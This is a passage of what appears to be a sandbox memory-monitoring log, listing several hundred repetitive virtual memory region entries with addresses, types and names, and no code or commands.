0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4126 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4127 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4128 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4129 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4130 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4131 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4132 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4133 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4134 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4135 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4136 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4137 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4138 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4139 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4140 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4141 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4142 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4143 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4144 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4145 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4146 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4147 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4148 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4149 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4150 start_va = 0x400000 end_va = 0x40efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4151 start_va = 0x400000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4152 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4153 start_va = 0x400000 end_va = 0x403fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 4154 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4155 start_va = 0xb8e0000 end_va = 0xbdd1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b8e0000" filename = "" Region: id = 4156 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4157 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4158 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4159 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4160 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4161 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4162 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4163 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4164 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4165 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4166 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4167 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4168 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4169 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4170 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4171 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4172 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4173 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4174 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4175 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4176 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4177 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4178 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4179 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4180 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4181 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4182 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4183 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4184 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4185 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4186 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4187 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4188 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4189 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4190 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4191 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4192 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4193 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4194 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4195 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4196 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4197 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4198 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4199 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4200 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4201 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4202 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4203 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4204 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4205 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4206 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4207 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4208 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4209 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4210 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4211 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4212 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4213 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4214 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4215 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4216 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4217 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4218 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4219 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4220 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4221 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4222 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4223 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4224 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4225 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4226 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4227 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4228 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4229 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4230 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4231 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4232 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4233 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4234 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4235 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4236 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4237 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4238 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4239 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4240 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4241 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4242 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4243 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4244 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4245 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4246 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4247 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4248 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4249 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4250 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4251 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4252 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4253 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4254 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4255 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4256 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4257 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4258 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4259 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4260 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4261 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4262 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4263 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4264 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4265 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4266 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4267 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4268 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4269 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4270 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4271 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4272 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4273 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4274 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4275 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4276 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4277 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4278 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4279 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4280 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4281 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4282 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4283 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4284 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4285 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4286 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4287 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4288 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4289 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4290 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4291 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4292 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4293 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4294 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4295 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4296 start_va = 0x470000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 4297 start_va = 0x4320000 end_va = 0x433dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 4298 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4299 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4300 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4301 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4302 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4303 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4304 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4305 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4306 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4307 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4308 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4309 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4310 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4311 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4312 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4313 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4314 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4315 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4316 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4317 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 4318 start_va = 0x470000 end_va = 0x47efff monitored = 1 entry_point = 